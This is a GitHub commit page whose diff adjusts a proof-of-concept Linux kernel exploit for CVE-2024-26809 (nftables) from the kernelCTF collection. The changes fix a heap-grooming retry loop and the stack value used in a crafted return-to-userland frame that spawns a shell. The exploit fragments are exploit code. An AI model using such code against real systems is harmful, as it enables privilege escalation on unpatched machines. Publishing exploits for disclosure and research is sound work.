Skip to content

Commit

Permalink
Fix bug
Browse files Browse the repository at this point in the history
  • Loading branch information
@conlonial
conlonial committed Oct 20, 2024
1 parent 8e8472f commit b76050f
Show file tree
Hide file tree
Showing 2 changed files with 4 additions and 3 deletions.
Binary file modified pocs/linux/kernelctf/CVE-2024-26809_lts_cos/exploit/lts-6.1.79/exploit
View file
Binary file not shown.
7 changes: 4 additions & 3 deletions pocs/linux/kernelctf/CVE-2024-26809_lts_cos/exploit/lts-6.1.79/exploit.c
View file
Original file line number Diff line number Diff line change
Expand Up @@ -207,7 +207,7 @@ void exploit(struct nl_sock *socket){
nl_socket_modify_cb(socket2,NL_CB_MSG_IN, NL_CB_CUSTOM, nl_callback_get_table, NULL);
int try_num = 0;
char *table_name = malloc(0x100);
int e=0,f=0;
int e=0,f=-1;
while(1){
printf("trying %d\n",try_num);
snprintf(table_name, 0x100, "table for test %d", try_num);
Expand All @@ -227,9 +227,10 @@ void exploit(struct nl_sock *socket){
break;
}
}
if(f!=0)
if(f!=-1)
break;
try_num++;
sleep(0.1);

}
//Now, we free many object to avoid crash
Expand Down Expand Up @@ -315,7 +316,7 @@ void exploit(struct nl_sock *socket){
*(uint64_t *)&setelem_data[0x98] = (uint64_t)shell;
*(uint64_t *)&setelem_data[0xa0] = user_cs;
*(uint64_t *)&setelem_data[0xa8] = user_rflags;
*(uint64_t *)&setelem_data[0xb0] = user_rsp;//|8;
*(uint64_t *)&setelem_data[0xb0] = user_rsp|8;
*(uint64_t *)&setelem_data[0xb8] = user_ss;

//Step 10: Delete `nft_table F`.
Expand Down

0 comments on commit b76050f

Please sign in to comment.